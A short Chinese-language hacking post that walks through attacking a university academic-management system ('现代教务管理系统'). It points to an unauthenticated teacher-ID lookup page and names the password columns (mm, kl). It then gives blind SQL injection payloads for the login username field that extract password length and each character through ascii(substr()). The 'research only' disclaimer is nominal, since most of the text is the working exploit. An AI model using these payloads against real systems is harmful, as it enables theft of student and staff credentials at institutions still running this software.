警告：本文只做技术研究！严禁用于非法用途！

教师对应编号查询地址没有验证，直接输入地址即可查询。

http://现代教务管理系统地址/cjqr_xzkcjs.aspx （那个随机括号内的东西完全可以去掉）

首先把外面的东西对应数据库里面的字段列一下。

密码-mm

教师、部门-js

口令-kl

学生用的密码mm字段，教师和部门用的口令kl字段。

注入语句：（写在登陆框用户名处就ok）

1.首先判断要猜解用户的密码长度

学号’and length(mm)>x–

职教号’and length(kl)>x–< />

直接登录，返回密码错误则是猜解正确。

2.猜解每一位密码

学号’and ascii(substr(mm,第几位,1))>xx–

职教号’and ascii(substr(kl,第几位,1))>xx–

同样返回密码错误i则是猜解正确。

3.解密

数据库中的数据时经过加密的，算法和解密工具我就不发出来了，点到为止。希望对此有研究的各位大虾也不要放出解密工具来，毕竟这个东西很多高校正在使用，影响力还是有点大。